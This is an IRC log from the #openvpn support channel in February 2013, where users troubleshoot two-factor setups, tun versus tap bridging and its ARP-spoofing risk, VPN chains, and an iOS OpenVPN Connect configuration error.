semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 21:12 <+pekster> You're not combining the 3rd traditional factor, biometric, so what's the point of using the phone? 21:12 * pekster doesn't get it 21:13 <+pekster> Or can you not distributed certs to your users? 21:13 <+pekster> (if you control the client hardware, you surely can) 21:13 <@krzee> !howsecurityworks 21:13 <@vpnHelper> "howsecurityworks" is security can be obtained by: something you have (certificates, usb tokens), something you know (passwords), something you are (biometrics). for best security use more than 1. if you save passwords to a file (!pwfile), you change them from something you know to something you have, which destroys the point of using passwords 21:13 <@krzee> a cert and a phone are both "SOMETHING YOU HAVE" 21:13 <@krzee> so not true 2-factor 21:13 < Maverick0984> still have to input user/pass 21:14 < Maverick0984> which generatesthe phoen call 21:14 <@krzee> then you have 2-factor 21:14 <@krzee> without the phone 21:14 < Maverick0984> it is still something you know and something you have 21:14 <+pekster> Oh, you're using the phone instaed of x509 certs? 21:14 <+pekster> Ish 21:14 < Maverick0984> there is a cert involved as well 21:14 < Maverick0984> whatever pfsense generated 21:14 <+pekster> Client certs? 21:14 < Maverick0984> not unique 21:14 <@krzee> the phone adds nothing except time 21:14 <@krzee> not unique!? 21:14 <@krzee> so you replaced proper PKI with phones 21:15 <@krzee> srs? 21:15 <+pekster> Public Kalling Infrastructure ;) 21:15 <@krzee> haha 21:15 < Maverick0984> it is still encrypted and is still user/pass required 21:15 <+pekster> I mean, it works, but it's a really nasty, colvoluted solution requiring the user to accept a phone call. What do they do if the cell has a dead battery, or has no service? 21:15 < Maverick0984> sigh, again, this wasn't my choice, i'm merely trying to make it work 21:16 < Maverick0984> criticizing "my" design isn't helping 21:16 <+pekster> Meh. Try the openvpn radius plugin (may resolve blocking) or add a timeout 21:16 < Maverick0984> i can't use any kind of plugin like that, the server is running on pfsense 21:16 <@krzee> im not much into stacking piles of crap on top of eachother, adding paint, and trying to call it complete 21:16 <+pekster> You already have our suggestions. Unless you need more help understanding them, you're not likely to get a pat-on-the-back for what you're trying to do. I get it isn't your choice, but I still think it's stupid (and pity won't change that) 21:16 < Maverick0984> it's not a normal install 21:16 <@krzee> i support pekster's last statement ^ 21:17 <@krzee> and yes, changing timeouts is a line in the server config 21:18 < Maverick0984> it's still something you have + something you know, following the very thing you linked, at this point, you guys are just being arrogant. not all of the users have smart phones so google auth or anything like it isn't an option. additionally, it is a start up where money isn't bountiful, so purchasing RSA ID hardware isn't an option either. 21:18 <@krzee> im glad ive never had to work for people that force me to impliment fail… so far everyone who has ever paid me to do work has done so because they feel that i am mentally well equipped to impliment win without them forcing fail upon me 21:18 <+pekster> Side note: your employer must not like things to work, since they don't let you do multi-factor in the most efficient way *and* also prevent you from using an OS where you can make the plugin work? Fun. Last I checked, pfsense could let you build the software yourself, unless you're also "prohibited" from doing it 21:19 <+pekster> krzee: Ugh, same comment, basically :P 21:20 < Maverick0984> i just got done explaining how both of your proposed other methods are not applicable, if you aren't even going to read what i type, why am i even here...sigh, forget it 21:20 < Maverick0984> thanks i guess 21:20 -!- Maverick0984 [maverick@poundcs.org] has left #openvpn [] 21:20 <+pekster> Lovely 21:20 <@krzee> people are funny 21:21 <+pekster> "becuase I'm not allowed" is not a technical reason. It's a social one. And yes, he has a social problem with his employer, and maybe he can hack a solution together. Hopefully he (or she) is paid very well, becuase that sounds really stressful 21:21 <@krzee> i HIGHLY doubt hes forced to that level of fail 21:21 <+pekster> Some shops are so "MS-centric" that even when implementing non-MS solutions, they force you to use as much of the MS-crap as they can. I just don't work for such people :) 21:22 <@krzee> that part i believe is forced 21:22 <@krzee> but using improper PKI and phones, that part i doubt is forced 21:22 <+pekster> I've done Openvpn+Linux/Unix+Radius+2-factor before, and it works great. Even securely too, if you can talk an AD admin into getting you the required LDAPS certs for the domain (that's actually a PITA, since you MUST install "Certificate Services" on a bloody domain controller. Thanks Redmond) 21:23 <+pekster> No, it's not enough to install cert services on a mere domain member server ;) 21:23 < NuclearMeltdown> krzee, oh clever 21:23 <@krzee> NuclearMeltdown, ya its pretty cool! 21:23 <+pekster> I laughed when I saw that KB article, and we just used our semi-secure unroutable management VLVAN for the traffic. If they can hack that VLAN, they deserve to MITM the RADIUS auth was the idea 21:24 <@krzee> so if you wanted, you could use 4 routes to override those 2, using the exact same idea 21:24 <+pekster> VLAN* 21:24 <@krzee> !cidr 21:24 <@vpnHelper> "cidr" is http://www.oav.net/mirrors/cidr.html 21:24 <@krzee> that would be a handy link if doing so 21:24 <+pekster> krzee: But, with IPv6 we can recurse even more! 21:24 <@krzee> muahaha 21:24 <+pekster> Haven't you always wanted to stack 64 VPNs on top of each other? 21:25 <@krzee> lets make a 64 vpn deep vpnchain 21:25 <@krzee> with inner vpns and everything 21:26 <@krzee> pekster, did i ever point you to my writeup on vpnchains where i gave my findings when doing a vpn in a vpnchain? 21:26 <+pekster> My 2-factor for your most-inner tunnel is going to be Morse-Code-Exchange of a PSK with someone on the south pole research station. If you can't get a contact, you can't connect. Because security. 21:26 <@krzee> hahahaha 21:26 <@krzee> i luled 21:27 <+EugeneKay> vpnception 21:27 <@krzee> nice! 21:27 <@krzee> https://www.secure-computing.net/wiki/index.php/OpenVPN/VpnChains 21:27 <@vpnHelper> Title: OpenVPN/VpnChains - Secure Computing Wiki (at www.secure-computing.net) 21:27 <@krzee> after turning client-b into another server, and connecting the laptop to that over the first vpnchain, i got BETTER throughput over that than the vpnchain 21:28 <@krzee> only slightly, but quite surprisingly 21:29 <+pekster> Basically a 'poor-mans-onion' netnwork 21:30 <+pekster> I did something silly like that with IETF 'special use network' ranges using PtP connections. It was very silly 21:30 <+pekster> I think you saw the pastebin of that :P 21:31 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 21:31 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 21:33 <+pekster> krzee, I wonder if the slight increase in perf throughput was the result of the measurement (ie: iperf) traffic using tcp, and something weird about the window or scaling. You might have had different results with 'iperf -u' 21:33 <+pekster> It's almost negligable, but tuning tcp opts often has very subtle changes like that 21:34 <@krzee> could be, too bad i didnt know ya 2.5 yrs ago ;] 21:34 <@krzee> cause i totally dont care to do it again 21:34 <+pekster> Right 21:34 <@krzee> well at least not now 21:34 <+pekster> It's a very silly thing to test unless you don't know what to do with your free time 21:35 <@krzee> im sure ill get another reason to setup some more vpnchains at some point 21:35 <+pekster> Go get IPv6 set up at your netework before you do this again 21:35 <@krzee> that sort of setup is why i learned enough to write !route 21:35 <@krzee> im sure thats a surprise, but its true lol 21:35 <@krzee> that sort of setup will FORCE you to understand iroute 21:36 <@krzee> hell, i had to dig into the code to understand it (so glad they do good commenting in the code!) 21:36 <+pekster> Real-world networking has enough complexities I don't care to create them needlessly when I'm at home 21:36 <@krzee> im into darknet building, it has real-world uses ;] 21:37 <@krzee> in the case of that test, one need not fully trust a few of the machines in the middle to use them in the darknet 21:38 <+pekster> Yea, darknet is just a shorthand way to explain Internet recursion 21:38 <@krzee> i dont help people directly with vpnchains too often tho, i simply tell them to understand !route good enough and the rest figures itself out ;] 21:38 <+pekster> tor is kind of a darknet in that sense, although they have gateways connecting both sides to eachother breaking the disjoined aspect 21:39 <@krzee> .onion is more darknet than tor itself, but i see what you mean and agree 21:40 <+pekster> Yea, I meant their tld 21:40 <+pekster> Otherwise it's a glorified cryptographicly secure anonymous proxy 21:42 <@krzee> in that case i slightly misunderstood and now fully agree without needing to liberally read into it ;] 21:42 <@krzee> i love watching my apps tell me what people in the office are doing 21:44 <@krzee> they watch the db for certain types of changes and message me about who does what, without anyone except me, the owner, and now the other 169 people in here knowing 21:45 <@krzee> one of the things that makes my $job so much cooler than Maverick0984's $job, i get to come up with cool ideas like that, and impliment them 21:46 <@krzee> nobody ever says "no, do it like this" they just say a variation of "cool, thanks for implimenting your ideas" 22:11 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 22:12 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 22:20 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 22:26 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 22:47 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving] --- Day changed Sun Feb 03 2013 00:49 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out] 00:53 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 01:05 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 01:06 -!- bjh4 [~bjh4@67.87.105.111] has quit [Ping timeout: 245 seconds] 01:25 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has joined #openvpn 02:11 -!- Sickness\ is now known as sickness\ 02:11 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 02:16 -!- sickness\ is now known as Sickness\ 02:16 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has quit [Changing host] 02:16 -!- Sickness\ [~stront@unaffiliated/s-work] has joined #openvpn 02:44 -!- eugenmayer [~EugenMaye@HSI-KBW-109-193-196-063.hsi7.kabel-badenwuerttemberg.de] has joined #openvpn 02:45 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 03:26 -!- Sickness\ is now known as sickness\ 03:31 -!- sickness\ is now known as Sickness\ 03:34 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 03:42 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 276 seconds] 03:46 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 03:47 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 03:52 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has quit [Quit: Computer has gone to sleep.] 04:01 < eugenmayer> iam sorry, but iam here again :) 04:02 < eugenmayer> After being able to setup the routed approach to merge to differen (VPN) networks, in my case the TCP and UDP one, i would like to the same with the bridged network, but with a slightly different approach. It makes a lot of effort in this specific network to deal with the new ip range, lets say 10.66.0.0 and 10.66.1.0 .. so i want to avoid this and go the "bridge approach" 04:03 < eugenmayer> i have found something here http://serverfault.com/questions/173307/sharing-an-ip-pool-for-two-openvpn-instances-one-tcp-and-one-udp .. but basically its just creating to tap devices with the same IP range, then bridging them to a new device, right? 04:03 <@vpnHelper> Title: dhcp - Sharing an IP pool for two openvpn instances (one TCP and one UDP) - Server Fault (at serverfault.com) 04:05 <+pekster> Do you really need Layer 2 (Ethernet) connections between the 2 instances? 04:05 <+pekster> If you're using IP (ie: IP addresses) to communicate, you don't need briding at all 04:06 <+pekster> !tunortap 04:06 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 04:06 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! 04:08 < eugenmayer> pekster: for that specific network yes. I have 6 routed, 1 bridged 04:09 < eugenmayer> i switched all networks from tap to tun a while ago, since EugeneKay adviced it. But with this one, i have to keep bridged and thats just fine 04:09 <+pekster> What protocol requires L2? 04:10 <+pekster> Outside of excotic use-cases like BGP, game broadcast advertisements, or multicast, you generally don't really need a bridged setup 04:11 < eugenmayer> pekster: one reason is multicast, the other is an application / maintaince reason 04:12 <+pekster> That said, sure, you can create a bridge an include tap0, tap1, and some physical device, and given the right firewall rules they'll all be on the same L2 link 04:12 <+pekster> tap0/tap1 binds to your two TCP/UDP instances, and eth0 to whatever the physical link is. Figure out some way to unify the addressing between them and it all works 04:13 < eugenmayer> pekster: unifying is ensure due to ccd 04:15 < eugenmayer> nice, it just worked 04:15 < eugenmayer> pekster: to be hones, looking at how compfortable this was with the bridged setup, its really a big plus for TCP/UDP merged networks 04:15 <+pekster> Only if you really need L2 visability. Otheriwse it's really inefficient with broadcasts, ARPs, and the overhead 04:16 < eugenmayer> because of CCD, i have now to do a lot more firewall-exceptions in those routed UDP/TCP networks, since the UDP guys have not there "original" ip 04:16 <+pekster> Just stick all the VPN networks in a supernet and be done with it 04:16 < eugenmayer> its just in our case, a lot of ports are client-specific firewalled .. and if you have a client with 10.77.0.12 .. and he connects with TCP havin 10.77.1.12 ..even if the networks are routed..you have to adjust every single FW rule 04:16 <+pekster> If you declare 10.20.0.0/16 as your VPN range, that gives you up to 256 /24's to allocate to VPN networks 04:17 <+pekster> The right high-level choices when laying out a network make life easier down the road 04:17 < eugenmayer> hmm, but that still wont help me in this case, or? 04:17 < eugenmayer> i mean, the TCP client MUST have a different IP then the UDP client ( same client ) in routed setups, right? 04:18 < eugenmayer> (dont get me wrong, i absolutely get your idea, but for that firewall exceptions, i will not really help, as long a client can connect using TCP or UDP) 04:18 <+pekster> Sure. Use a --client-connect script to firewall them if that's what you want. I did this easily for "contract" accounts that connected to my former employer's network. They were only allowed to go to specific hosts/ports due to security concerns 04:18 <+pekster> Right. Set up your stuff properly and it won't matter where they connect or what IP they have 04:19 < eugenmayer> Wait, just stick to that 04:19 <+pekster> Your setup is really inscure if you trust the IP, becuase you do realize a client can set their own IP on the tap network, right? 04:19 < eugenmayer> pekster: hm, i though he will not be able to communicate through the tunnel anymore, since openVPN secures that? 04:19 < eugenmayer> (call me stupid, i might be wrong on this) 04:19 <+pekster> In tap you've just given the client direct Ethernet access to anything on the bridge 04:20 < eugenmayer> so thats only valid for tun? 04:20 <+pekster> Right, in tun an openvpn server drops traffic that is sourced from an invalid address 04:21 <+pekster> In tap it only cares about the MAC since it's a Layer 2 connection 04:21 <+pekster> tap = OSI Layer 2 04:21 <+pekster> tun = OSI Layer 3 04:21 <+pekster> In other words, you're doing your security completely wrong 04:22 < eugenmayer> well no and yes 04:22 <+pekster> It's like a MAC filter on some home firewall. Sure, it might keep the random stranger from connecting to you, but it's not "secure" 04:22 < eugenmayer> lets say for the tap devices iam doing basically bad..but its not that IP based FW is the only secure-protocoll. Its still kes and so forth..its just a generic approach 04:22 <+pekster> Yes, the data is protected. But "any" client any use "any" IP on a tap-based VPN 04:22 < eugenmayer> for the tun networks it seems to be better. But yeah, thanks for open muy eyes here 04:23 <+pekster> You can even perform attacks like ARP-spoofing 04:23 < eugenmayer> if i have IP based fw rules an i would siwthc to bridged for easier TCP/UDP network rules, i just fk it up 04:23 < eugenmayer> pekster++ 04:23 <+pekster> A VPN client on your tap VPN can ARP-posion any client on either VPN or the physical network you've bridged. This includes your default gateway 04:24 < eugenmayer> Is that one of the reasons you dont avice tap ? 04:24 <+pekster> Indeed. 04:24 <+pekster> If your reason is "it's easier to firewall" you're doing it wrong to begin with 04:24 <+EugeneKay> Plus it eats kittens. 04:24 <+EugeneKay> Please, think of the kittens. 04:24 <+pekster> Yes. That too :P 04:26 < eugenmayer> EugeneKay: well in my software-developer job i kill kittens all day 04:26 <+pekster> /usr/local/sbin/openvpn --sacrifice-kitten --dev tap0 ... 04:26 < eugenmayer> as 30% of my time i do PHP, and that kills em all 04:26 < eugenmayer> so it does not really matter for me, iam sorry. Kittens are all dead by now 04:27 < eugenmayer> Iam a bad person, i know 04:27 < eugenmayer> eugenmayer-- 04:27 <+pekster> L2 isn't bad if you're using it for the right reasons. As seen in the bot's comment above, most people don't 04:27 <+pekster> Usually folks use it as a crutch for something better handled through correct network layout 04:28 <+pekster> Very few things on the modern Internet/WAN actually need L2 04:29 < eugenmayer> EugeneKay: explained me, how i potentially could switch to tun with my specific need pekster, but as usually, i did not understand a single word of what he said 04:29 -!- catsup [d@64.111.123.163] has quit [Read error: Connection reset by peer] 04:29 < eugenmayer> (me being the reason) 04:30 <+pekster> The only valid reason you listed is multicast. Do you really need multicast over the VPN? What's the use-case there? 04:31 < eugenmayer> One reason for me is, that my automated application deployment does ip-based vhosts setups for the maintainance network, means:. The client has his own interface, lets say eth0, could be anything. The applcation is deployed for his network on a specific ip (auto setup) …. now for the maintainance vhost we use the VPN, were the server of the customer is a client, lets say one ip of 10.66.0.0 ... 04:32 < eugenmayer> One issue is, if the tun interface goes down, e.g. the customers network-connection drops, firewall tests or our VPN server detonates, all services bound to that IP do crash 04:32 < eugenmayer> since there is no interface with network left 04:32 <+pekster> If your application crashes becuase it can't reach an internal VPN-assigned IP, you've screwed up way before OpenVPN 04:33 <+pekster> OpenVPN can't fix stupid programming practices 04:33 < eugenmayer> pekster: no, its not reaching..its rather daemons 04:33 < eugenmayer> like mysql but also vhost configurations 04:34 <+pekster> Oh, so you're binding to the IP on the tun interface? 04:34 < eugenmayer> yes, thats the issue 04:34 <+pekster> Solve that by binding to *:port and firewall it 04:34 <+pekster> Use the wildcard address to bind 04:34 <+pekster> Or bounce services bound to a VPN IP when the VPN goes down. --up and --down sscripts can hook into this for you if you want 04:35 < eugenmayer> yeah, its sounds that simple, but since this is all automated, of course that is a huge ammount of work .. firewalling is easy..i do the firewalling anyway, no matter what i bound to 04:35 < eugenmayer> ( i do not need to add anyting new to the firwall, thats what i meant, its up there to cut anyting else off anyway…its deny all with only a few exceptions.no matter what the services bound to) 04:36 < eugenmayer> pekster: well i have to think about that and test it. Thanks for calrifying even more what downsides bridged networks have 04:37 <+pekster> You really don't need Ethernet at all. Last big company I had a regular gig at, they had thousands of remote servers (some physical, many virtual) with a VPN IP running all sorts of stuff: ssh, java apps, and some other stuff. It all worked fine over a tun setup. If your apps don't, you've designed them poorly 04:37 <+pekster> (openvpn, btw) 04:37 < eugenmayer> well its not a application issue, its a deployoment/infra issues 04:38 <+pekster> "Deployment" = "some application that does stuff" at a high level 04:38 < eugenmayer> the applactions does not care of all (of course), its rather deamons going down 04:38 <+pekster> "daemons" "deployment" ... you're doing a great job of failing to explain what *network* protocols you *need* ethernet-level connectivity for 04:38 < eugenmayer> yeah, i might seperate them differently. Application (the one we sell) .. anything else "infrastructure" but i get your point, it does not matter for you 04:39 < eugenmayer> i dont need OSI level 2 at all, thats for sure. We dont need multicast "really" here 04:39 < eugenmayer> there is one network we need that, thats our proxmox network, since the cluster-setup uses multicast to find its nodes 04:40 -!- julius [~julius@141.41.92.122] has joined #openvpn 04:40 < eugenmayer> (the network all proxmox nodes are connected) but in the end, i dont have any other network relying on multicast 04:40 -!- julius is now known as Guest32238 04:41 < eugenmayer> I dont want to waste your time even more. You have been a really great help to me. I will initiate a sprint to see how we can change that network to a routed one 05:05 -!- eugenmayer [~EugenMaye@HSI-KBW-109-193-196-063.hsi7.kabel-badenwuerttemberg.de] has quit [Ping timeout: 252 seconds] 05:18 -!- dazo_afk is now known as dazo 05:35 -!- mode/#openvpn [-v pekster] by ChanServ 05:58 < spitf1r3> Hi. Does anybody here use OpenVPN Connect for iOS? 06:10 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 06:15 < kisom> spitf1r3: I do 06:16 < kisom> Spent yesterday and the day before that on getting everything to work, doing trial rollouts atm :) 06:16 < spitf1r3> I got a strange problem: 06:16 < spitf1r3> 2013-01-31 14:30:01 EVENT: CONFIG_FILE_PARSE_ERROR option_error: remote option not specified [ERR] 06:16 < spitf1r3> 2013-01-31 14:30:01 EVENT: DISCONNECT_PENDING 06:16 < spitf1r3> And I DO have remote in my config file 06:17 < kisom> Pase your client config somewhere. 06:17 < spitf1r3> and it's resolvable 06:17 < spitf1r3> ok 06:18 < spitf1r3> can I msg you? 06:19 < kisom> Just paste it on www.pastebin.ca 06:19 < spitf1r3> http://pastie.org/6033049 06:19 -!- mattock_afk is now known as mattock 06:19 < spitf1r3> oh 06:20 < spitf1r3> that's an old one.. 06:20 < spitf1r3> hold on 06:21 < spitf1r3> http://pastie.org/6033062 06:22 < spitf1r3> Short message says VPN-On-Demand configuration error: CertificateRef undefined 06:23 < kisom> Seems legit. Try adding verb 7 and check the logs on your ipad 06:23 < spitf1r3> And it does that no matter if I have a certificate uploaded to my iPod as ca/crt/key 06:23 < spitf1r3> or unified 06:23 < spitf1r3> or installed in iOS from p12 06:24 < kisom> spitf1r3: Can you try with my unified config file? I know it works 06:24 < kisom> http://www.pastebin.ca/2310334 06:24 < spitf1r3> I did try that 06:24 < spitf1r3> with the same result 06:25 < spitf1r3> but I need to make sure what do I need to put there 06:25 < spitf1r3> :) 06:25 < kisom> Just paste your ca, certificate and key in their respective "xml" tag 06:26 < spitf1r3> this is what I used: http://pastie.org/6033073 06:27 < kisom> spitf1r3: Set verb 7 in whatever configuration you're using and upload the iOS client log somewhere 06:27 < spitf1r3> ca.crt as mieszko-ipodtouch4.key as and mieszko-ipodtouch4.crt as 06:27 < spitf1r3> of cource the contents of these 06:28 < spitf1r3> parts form -----BEGIN CERTIFICATE----- to -----END CERTIFICATE----- 06:28 < spitf1r3> kisom: I just need to know if I pated right stuff to right fields. These certs have been generated by openvpn-easy-rsa 06:28 < spitf1r3> so should be fairly standard by naming 06:29 < kisom> spitf1r3: Yes, that's correct. But according to what you said before the certificates are not the problem here 06:29 < spitf1r3> okay 06:30 < spitf1r3> but short message in ovpnconnect says: "VPN-On-Demand configuration error: CertificateRef undefined" 06:30 < spitf1r3> that's why I want to make sure 06:31 < kisom> OK 06:31 < kisom> I'll continue helping you when you've sent me the verb 7 log files. 06:33 < spitf1r3> ok 06:33 < spitf1r3> and the log is EXACTLY the same (ok, the hour is different) 06:34 < spitf1r3> and that's the WHOLE log. Only 2 lines 06:34 < kisom> OK 06:35 < kisom> So I assume OpenVPN fails to parse your config and then complains that the remote directive is missing. 06:35 < spitf1r3> and a very similar config (but with p12) works on my android phone 06:36 < spitf1r3> (same server) 06:36 < kisom> Try with the config file I posted. 06:36 < kisom> I also had issues with some other config files 06:37 < kisom> Just change the cipher and your remote server 06:37 < spitf1r3> auth-user-pass is for authenticating with user/password? 06:37 < spitf1r3> I'm authenticating with a crt ONLY 06:37 < kisom> Same 06:37 < kisom> I just leave it blank 06:37 < kisom> At least on my testing setup 06:39 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 06:39 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 06:40 < spitf1r3> I don't know the cipher, I didn't specify it in server config 06:40 < spitf1r3> what is the default? 06:40 < kisom> Comment it out then 06:40 < kisom> The default one is blowfish-128 if i remember correctly 06:43 < spitf1r3> it's the same.. 06:43 < spitf1r3> I've tried to ping the host, and it resolves correctly 06:46 < spitf1r3> kisom: any ideas? 06:46 < kisom> spitf1r3: Working on it, sec 06:47 < spitf1r3> Just to make sure: you are using Official OpenVPN COnnect from AppStore, not GuizmoVPN from cydia? 06:47 < kisom> Yes 06:47 < spitf1r3> because GuizmoVPN used to work for me 06:53 < spitf1r3> I need to go, and will be away for next 30 minutes. But I do have an always-on IRC client, so you can write me, and I won't miss it. 06:53 < kisom> OK, great. 06:53 < spitf1r3> When I'm back, I'll ping you 06:53 < spitf1r3> same nick, same all 06:54 < spitf1r3> and I'll b able to test it from another network then, too. 06:54 < kisom> spitf1r3: Try this profile when you're back: https://stormhub.org/dump/iOS-Test-Profile.ovpn 06:58 < kisom> Tell me when you're back and I'll enable that certificate you can connect 06:58 -!- mattock is now known as mattock_afk 07:02 -!- master_of_master [~master_of@p57B5233B.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 07:02 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Read error: Connection reset by peer] 07:03 -!- master_of_master [~master_of@p57B554B3.dip.t-dialin.net] has joined #openvpn 07:22 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 07:25 <+EugeneKay> I think it goes without saying that posting private keys in a public IRC channel is a very, very bad idea. 07:26 < spitf1r3> I'm still on the move, but I can tell that my android phone fails to connect with this profile 07:27 < kisom> EugeneKay: Why is that? That specific certificate doesn't have permission to do anything. 07:27 <+EugeneKay> ......It's just a general principle of sanity. 07:27 <+EugeneKay> Private keys. It's in the name. 07:27 < spitf1r3> kisom: so I guess it won't work on ios as well 07:27 < kisom> spitf1r3: I'm logged on to that specific profile as we speak, on iOS 07:28 < spitf1r3> okay 07:28 < spitf1r3> well try itinn few minutes when I'm back 07:29 < kisom> spitf1r3: Try it again now 07:29 < kisom> On android, that is 07:31 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 07:32 < kisom> spitf1r3: I see you on the server 07:32 < spitf1r3> worked on android 07:32 < kisom> Yeah I was denying that certificate before, that's why you got an error 07:34 -!- Eagleman [~Eagleman@vpn.eagleman.net] has left #openvpn [] 07:55 < spitf1r3> I'm back 07:55 < spitf1r3> hold on, I'll try it on iOS 08:05 -!- b1rkh0ff [~b1rkh0ff@178.77.15.65] has quit [Ping timeout: 255 seconds] 08:08 <@plaisthos> yeah: Author: Samuli Seppänen 08:08 <@plaisthos> :D 08:09 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 08:13 -!- mattock_afk is now known as mattock 08:18 -!- b1rkh0ff [~b1rkh0ff@178.77.21.150] has joined #openvpn 08:20 < kisom> spitf1r3: Did it work? 08:20 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 08:25 < spitf1r3> kisom: I get the same error... 08:25 < spitf1r3> I'll remove this app 08:25 < spitf1r3> and try again.. 08:26 -!- Eagleman [~Eagleman@84.107.205.159] has joined #openvpn 08:26 < kisom> spitf1r3: What iOS version are you on? 08:27 < spitf1r3> 6.0.1 08:27 < spitf1r3> Jailbroken 08:27 < spitf1r3> And I thing I just found a reason why it didn't work 08:27 < kisom> OK, I'm on 6.1, non-JB 08:27 < spitf1r3> /etc/hosts was messed up 08:27 < spitf1r3> just copied from another device, wll test now 08:28 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 264 seconds] 08:32 -!- Eagleman [~Eagleman@84.107.205.159] has quit [Ping timeout: 245 seconds] 08:38 < spitf1r3> Hmm, still the same 08:38 < spitf1r3> will try another device 08:38 < kisom> OK, I've tried that specific profile on both my iPhone and my iPad, and it works on both 08:39 < kisom> Guess you're out of luck. Reinstall the iPod and I'm sure it'll work great. 08:40 < kisom> I'm gonna disable that profile now btw, I see 5 people connected from that certificate I posted :) 08:40 < spitf1r3> can you hold that profile for a few moments? 08:40 < spitf1r3> oh 08:40 < kisom> Sure 08:40 < kisom> I'll wait. 08:41 < spitf1r3> hmmm 08:41 < spitf1r3> it works 08:41 < spitf1r3> when I've restarted in 'safe mode' (without any tweaks) 08:42 < spitf1r3> wonder what causes that 08:42 < spitf1r3> okay, go on and disable that:) 08:42 < spitf1r3> Thanks for help 08:42 < kisom> np 08:43 < spitf1r3> Now if you see such problem ask (jailbroken) people to restart in (mobilesubstrate) safe mode;) 08:47 -!- mattock is now known as mattock_afk 09:05 -!- mattock_afk is now known as mattock 09:13 -!- bjh4 [~bjh4@67.87.105.111] has joined #openvpn 09:14 -!- mattock is now known as mattock_afk 09:36 -!- BtbN [~btbn@btbn.de] has quit [Ping timeout: 264 seconds] 09:38 -!- BtbN [~btbn@btbn.de] has joined #openvpn 09:52 -!- fys [~fys@108-65-116-255.lightspeed.austtx.sbcglobal.net] has quit [Ping timeout: 264 seconds] 09:55 -!- bjh4 [~bjh4@67.87.105.111] has quit [Ping timeout: 245 seconds] 09:55 -!- fys [~fys@108-65-116-255.lightspeed.austtx.sbcglobal.net] has joined #openvpn 10:06 -!- Guest32238 [~julius@141.41.92.122] has left #openvpn [] 10:07 -!- julius_ [~julius@141.41.92.122] has joined #openvpn 10:07 < julius_> hi 10:07 < julius_> any hints for optimizing openvpn over tor? 10:07 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:08 -!- dazo is now known as dazo_afk 10:12 -!- blackmagic [~black@got.laid.using.blackmajic.org] has quit [Ping timeout: 276 seconds] 10:14 -!- blackmagic [~black@got.laid.using.blackmajic.org] has joined #openvpn 10:25 -!- julius__ [~julius@141.41.92.122] has joined #openvpn 10:25 -!- julius_ [~julius@141.41.92.122] has quit [Ping timeout: 245 seconds] 10:28 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 11:00 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 11:25 -!- fys [~fys@108-65-116-255.lightspeed.austtx.sbcglobal.net] has quit [Ping timeout: 255 seconds] 11:28 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 264 seconds] 11:29 -!- fys [~fys@108-65-116-255.lightspeed.austtx.sbcglobal.net] has joined #openvpn 11:50 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 11:51 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Read error: Connection reset by peer] 11:52 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 11:55 -!- Valcorb [~Valcorb@84.198.139.192] has joined #openvpn 11:57 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 245 seconds] 11:59 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 